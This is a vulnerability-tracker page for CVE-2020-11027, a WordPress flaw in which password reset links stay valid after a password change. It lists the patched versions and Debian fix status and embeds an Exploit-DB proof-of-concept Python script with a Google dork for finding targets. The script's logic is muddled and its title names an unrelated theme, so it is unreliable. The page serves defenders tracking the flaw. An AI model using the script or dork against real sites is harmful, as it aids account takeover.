CVE-2020-11027

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

In affected versions of WordPress, a password reset link emailed to a user does not expire upon changing the user password. Access would be needed to the email account of the user by a malicious party for successful execution. This has been patched in version 5.4.1, along with all the previously affected versions via a minor release (5.3.3, 5.2.6, 5.1.5, 5.0.9, 4.9.14, 4.8.13, 4.7.17, 4.6.18, 4.5.21, 4.4.22, 4.3.23, 4.2.27, 4.1.30, 4.0.30, 3.9.31, 3.8.33, 3.7.33).

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-51531 webapps php python · 2 KB

Amirhossein Bahramizadeh · 2023-06-19

WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password

python exploit Source: Exploit-DB

# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
# Dork: inurl:/wp-includes/class-wp-query.php
# Date: 2023-06-19
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
# Version: 1.0.0 (REQUIRED)
# Tested on: Windows/Linux
# CVE: CVE-2020-11027

import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta

# Set the WordPress site URL and the user email address
site_url = 'https://example.com'
user_email = 'user@example.com'

# Get the password reset link from the user email
# You can use any email client or library to retrieve the email
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
with open('password_reset_email.html', 'r') as f:
    email = f.read()
    soup = BeautifulSoup(email, 'html.parser')
    reset_link = soup.find('a', href=True)['href']
    print(f'Reset Link: {reset_link}')

# Check if the password reset link expires upon changing the user password
response = requests.get(reset_link)
if response.status_code == 200:
    # Get the expiration date from the reset link HTML
    soup = BeautifulSoup(response.text, 'html.parser')
    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
    print(f'Expiration Date: {expiration_date}')

    # Check if the expiration date is less than 24 hours from now
    if expiration_date < datetime.now() + timedelta(hours=24):
        print('Password reset link expires upon changing the user password.')
    else:
        print('Password reset link does not expire upon changing the user password.')
else:
    print(f'Error fetching reset link: {response.status_code} {response.text}')
    exit()

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`5.4.1+dfsg1-1`
sid	Fixed	`5.4.1+dfsg1-1`
forky	Fixed	`5.4.1+dfsg1-1`
bullseye	Fixed	`5.4.1+dfsg1-1`
bookworm	Fixed	`5.4.1+dfsg1-1`

References

https://security-tracker.debian.org/tracker/CVE-2020-11027

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.